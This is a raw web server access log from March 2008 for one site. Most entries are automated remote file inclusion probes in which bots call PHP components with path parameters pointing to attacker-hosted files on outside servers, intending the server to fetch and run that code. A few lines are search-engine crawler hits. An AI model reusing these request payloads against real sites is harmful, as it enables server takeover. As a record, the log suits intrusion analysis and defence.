4.79.181.232 - - [27/Mar/2008:05:21:49 -0700] "GET /logs/access_080225.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:21:51 -0700] "GET /logs/access_080225.log//index.php?body=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.45.130 - - [27/Mar/2008:05:22:23 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [27/Mar/2008:05:22:23 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [27/Mar/2008:05:22:23 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:05:23:09 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:05:23:09 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:05:23:10 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:05:23:23 -0700] "GET /myevent.php?myevent_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.230.7.194 - - [27/Mar/2008:05:23:23 -0700] "GET /logs/myevent.php?myevent_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:24:01 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:24:01 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:24:02 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.45.130 - - [27/Mar/2008:05:24:02 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:24:38 -0700] "GET /logs/access_071211.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.236 - - [27/Mar/2008:05:24:40 -0700] "GET /logs/access_071211.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.230 - - [27/Mar/2008:05:24:52 -0700] "GET /logs/access_071211.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:05:25:08 -0700] "GET /logs/myevent.php?myevent_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
84.40.17.23 - - [27/Mar/2008:05:25:08 -0700] "GET /myevent.php?myevent_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
4.79.181.232 - - [27/Mar/2008:05:25:20 -0700] "GET /logs/access_071211.log//db.php?path_local=http://www.tdepk.ru/guest/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:27:05 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:27:06 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:27:06 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:05:27:07 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:05:27:07 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:05:27:19 -0700] "GET /myevent.php?myevent_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
61.38.15.70 - - [27/Mar/2008:05:27:19 -0700] "GET /logs/myevent.php?myevent_path=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.246.22.2 - - [27/Mar/2008:05:27:40 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/h4_dy/word.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:27:49 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:27:49 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.251.21.163 - - [27/Mar/2008:05:27:54 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.251.21.163 - - [27/Mar/2008:05:27:54 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.251.21.163 - - [27/Mar/2008:05:27:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:27:57 -0700] "GET /logs/access_080312.log//archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:27:57 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:28:05 -0700] "GET //archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:28:13 -0700] "GET /logs//archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:28:21 -0700] "GET /logs/access.log//archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:05:28:22 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:05:28:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.75.43 - - [27/Mar/2008:05:28:23 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:05:28:25 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.21.223.90 - - [27/Mar/2008:05:28:28 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:05:29:19 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:05:29:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:05:29:20 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:05:29:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:05:29:47 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:05:30:35 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:05:30:38 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:05:30:39 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:31:16 -0700] "GET /logs/access_080225.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:31:16 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:31:16 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.251.21.163 - - [27/Mar/2008:05:31:16 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.balisource.net/tools/scan/gallery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.80.9 - - [27/Mar/2008:05:31:47 -0700] "GET /logs/access_071122.log//classes/adodbt/sql.php?classes_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.207.204.13 - - [27/Mar/2008:05:32:39 -0700] "GET /logs/access_080125.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.feedusers.com/th/images/.errors.php/asc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.187.100.193 - - [27/Mar/2008:05:34:26 -0700] "GET /logs/access_080313.log//etc//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.187.100.193 - - [27/Mar/2008:05:34:32 -0700] "GET /logs//etc//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:34:32 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:34:33 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:34:34 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:05:37:08 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.35.14 - - [27/Mar/2008:05:37:31 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [27/Mar/2008:05:37:42 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [27/Mar/2008:05:37:54 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:37:58 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:05:38:18 -0700] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.99 - - [27/Mar/2008:05:38:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.156 - - [27/Mar/2008:05:38:55 -0700] "GET /tmp/?N=A HTTP/1.0" 200 1488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.92.16.167 - - [27/Mar/2008:05:39:27 -0700] "GET /logs/access_080201.loghttp://amyvsweddingspartyss.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/4.75 [en]" "www.dmulk.com"
209.200.254.85 - - [27/Mar/2008:05:40:51 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:43:00 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:43:01 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:43:02 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.200 - - [27/Mar/2008:05:44:43 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.200 - - [27/Mar/2008:05:44:43 -0700] "GET //index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.200 - - [27/Mar/2008:05:44:43 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.200 - - [27/Mar/2008:05:45:07 -0700] "GET //index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.83.83 - - [27/Mar/2008:05:45:10 -0700] "GET /logs/access_080209.log/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://amsny.org/site/modules/forum/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.83.83 - - [27/Mar/2008:05:45:10 -0700] "GET /modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://amsny.org/site/modules/forum/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.83.83 - - [27/Mar/2008:05:45:11 -0700] "GET /logs/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://amsny.org/site/modules/forum/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:05:45:20 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:05:45:20 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:05:45:21 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.54.166.71 - - [27/Mar/2008:05:45:27 -0700] "GET /logs/access_080312.loghttp://amyvsweddingspartyss.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "www.dmulk.com"
74.53.240.146 - - [27/Mar/2008:05:45:45 -0700] "GET //index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [27/Mar/2008:05:46:17 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [27/Mar/2008:05:46:17 -0700] "GET //index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [27/Mar/2008:05:46:17 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.esoterium.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [27/Mar/2008:05:46:44 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [27/Mar/2008:05:46:45 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [27/Mar/2008:05:46:45 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:05:47:08 -0700] "GET //?pg=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 3094 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:05:47:08 -0700] "GET /logs//?pg=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 40554 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.185.237.35 - - [27/Mar/2008:05:47:13 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.187.100.193 - - [27/Mar/2008:05:47:52 -0700] "GET /logs/access_080312.log//etc//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.17.155 - - [27/Mar/2008:05:49:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.62 - - [27/Mar/2008:05:49:08 -0700] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.221.130.3 - - [27/Mar/2008:05:51:23 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ham-sur-heure-nalinnes.net/poll/polldata/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:05:51:59 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.224 - - [27/Mar/2008:05:52:22 -0700] "GET /index.php?pag=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.216.249.224 - - [27/Mar/2008:05:52:22 -0700] "GET /logs/index.php?pag=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
213.156.192.5 - - [27/Mar/2008:05:54:00 -0700] "GET /logs/access_080113.log/index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [27/Mar/2008:05:54:00 -0700] "GET /index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.156.192.5 - - [27/Mar/2008:05:54:01 -0700] "GET /logs/index.php?place=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:05:54:05 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thehogbitch.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:05:54:08 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.thehogbitch.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.22.161 - - [27/Mar/2008:05:54:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
